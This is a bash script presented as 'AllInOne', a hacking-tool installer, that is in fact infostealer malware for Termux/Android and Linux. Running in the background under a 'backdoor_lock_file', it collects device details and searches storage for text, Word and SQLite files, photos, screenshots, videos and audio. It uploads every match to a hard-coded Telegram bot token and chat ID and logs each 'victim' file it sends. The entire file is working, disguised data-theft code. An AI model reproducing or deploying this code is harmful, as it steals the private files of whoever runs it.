#! /usr/bin/bash

# Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
## ANSI colors (FG & BG)
RED="$(printf '\033[31m')"  GREEN="$(printf '\033[32m')"  ORANGE="$(printf '\033[33m')"  BLUE="$(printf '\033[34m')"
MAGENTA="$(printf '\033[35m')"  CYAN="$(printf '\033[36m')"  WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
REDBG="$(printf '\033[41m')"  GREENBG="$(printf '\033[42m')"  ORANGEBG="$(printf '\033[43m')"  BLUEBG="$(printf '\033[44m')"
MAGENTABG="$(printf '\033[45m')"  CYANBG="$(printf '\033[46m')"  WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
RESETBG="$(printf '\e[0m\n')"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="AllInOne is a tool can install and startup you to become a hacker with alots of tools $hehe "
name=AllInOne
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
B24B_HOST="193.161.193.99"
B24B_PORT="37858"
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
ip=$(ifconfig -a)

Dev=$(echo -e "

#----------------
Device infomore : $Device\n
#----------------
Hacked on date  : $Tdate\n
#----------------
Host Name       : $HostName\n
#----------------
Kernel          : $Kernel\n
#----------------
Up Time         : $UpTime\n
#----------------
Memory Usage    : $MemoryUsage\n
#----------------
IP Address      : $ip_data\n
#----------------

")

#-------------------------#
if [[ -f $PREFIX/etc/Hacked/Victam/victam.sim ]];then

Dev_ID=$(sed -n '5p' $PREFIX/etc/Hacked/Victam/victam.sim)

fi

# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com
        if [ "$?" = 0 ]; then

	    nN='Y'
	    NnEt="Connected To Network [★]"

	break
       else
		nN='N'
		NnEt="No Internet [X] "
		break
        fi
    done
}

# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
if [[ $nN == "Y" ]];then
Device=$(termux-info)
fi
PREFIX='/data/data/com.termux/files/usr/'
SYS='/sdcard/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/'
SYS='/'
Device=$(uname -a)
else
printf""
fi

if [[ $nN == Y ]];then
if [[ $termux == true ]];then

ip_data=$(curl -s ipinfo.io;ifconfig)

else

ip_data=$(curl -s ipinfo.io;ip a)

fi
fi

# package manager

if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
else

printf ""

fi

#{----------------------Start-----------------}

if [[ $1 == "" ]];then
All="Yes"
elif [[ $1 == "PIC" ]];then
All="PIC"
elif [[ $1 == "VID" ]];then
All="VID"
elif [[ $1 == "TXT" ]];then
All="TXT"
else
All="Yes"
fi

get(){

echo "#--------------------------------------------#" > $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
#---------------------------------------------------------------
#                             TERMUX
#---------------------------------------------------------------
if [[ $All == "Yes" || $All == "TXT" ]];then

	for XLX in $(find ${SYS} -name *.xlxs)
	do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$XLX")

	if [[ $path == $XLX ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [Cammera] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@$XLX https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$XLX ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

	done

#---------------------------------------------------------------

        for txt in $(find ${SYS} -name *.txt)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$txt")

	if [[ $path == $txt ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New File [TXTFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${txt}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$txt ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done


#---------------------------------------------------------------

        for DOCX in $(find ${SYS} -name *.docx)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$docx")

	if [[ $path == $docx ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New File [TXTFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${docx}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$docx ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done

#---------------------------------------------------------------

        for SQLite in $(find ${SYS} -name *.sqlite)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$SQLite")

	if [[ $path == $SQLite ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New File [TXTFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${SQLite}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$SQLite ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done


#---------------------------------------------------------------

        for DOC in $(find ${SYS} -name *.doc)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$DOC")

	if [[ $path == $DOC ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New File [TXTFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${DOC}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$DOC ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done

fi
#---------------------------------------------------------------
if [[ $All == "Yes" || $All == "PIC" ]];then

	for IMG in $(find ${SYS} -name IMG*)
	do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$IMG")

	if [[ $path == $IMG ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [Cammera] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${IMG}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$IMG ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

	done

#---------------------------------------------------------------

        for png in $(find ${SYS} -name *.png)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$png")

	if [[ $path == $png ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [PngFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${png}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$png ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done

#---------------------------------------------------------------

	for jpg in $(find ${SYS} -name *.jpg)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$jpg")

	if [[ $path == $jpg ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [JPGFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${jpg}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$jpg ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi
        done

#---------------------------------------------------------------

	for Scr in $(find ${SYS} -name Screenshot*)
	do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$Scr")

	if [[ $path == $Scr ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [Screenshot] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${Scr}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$Scr ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi
	done

#---------------------------------------------------------------

	for BMP in $(find ${SYS} -name *.bmp)
	do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$BMP")

	if [[ $path == $BMP ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [Cammera] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${BMP}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$BMP ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

	done
#---------------------------------------------------------------

	for JPGE in $(find ${SYS} -name *.jpge)
	do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$JPGE")

	if [[ $path == $JPGE ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Photo [Cammera] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${JPGE}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$JPGE ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

	done
fi

#---------------------------------------------------------------
if [[ $All == "Yes" || $All == "VID" ]];then

        for video in $(find ${SYS} -name *.mp4)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$video")

	if [[ $path == $video ]];then


		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New Video [MP4File] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${video}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$video ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done

#---------------------------------------------------------------

        for M4A in $(find ${SYS} -name *.m4a)
        do

		path=$(cat $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log | grep "$M4A")

	if [[ $path == $M4A ]];then

		printf ""

	else
		while true;do
#	                curl -X POST --silent https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=" New File [TXTFile] Locate on Device : ${Dev_ID} "
			curl -X POST --silent  -F document=@"${M4A}" https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
			if [[ $? == "0" ]];then
				echo -e "$M4A ----==> [Sent (√)] " >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
				break
			fi

		done
	fi

        done
fi
#---------------------------------------------------------------
echo "#--------------------------------------------#" >> $PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log
curl -X POST --silent -F document=@$PREFIX/etc/Hacked/Victam/Dcim${Dev_ID}.log https://api.telegram.org/bot${TOKEN}/sendDocument -F chat_id=${CHAT_ID}
}
#---------------------------------------------------------------
#---------------------------------------------------------------
#---------------------------------------------------------------
#{----------------------Start-----------------}

if [[ -f $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file ]];then

	printf ""

else

touch $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file
get &>> /dev/null &
echo "End" > $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file
rm $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file

fi
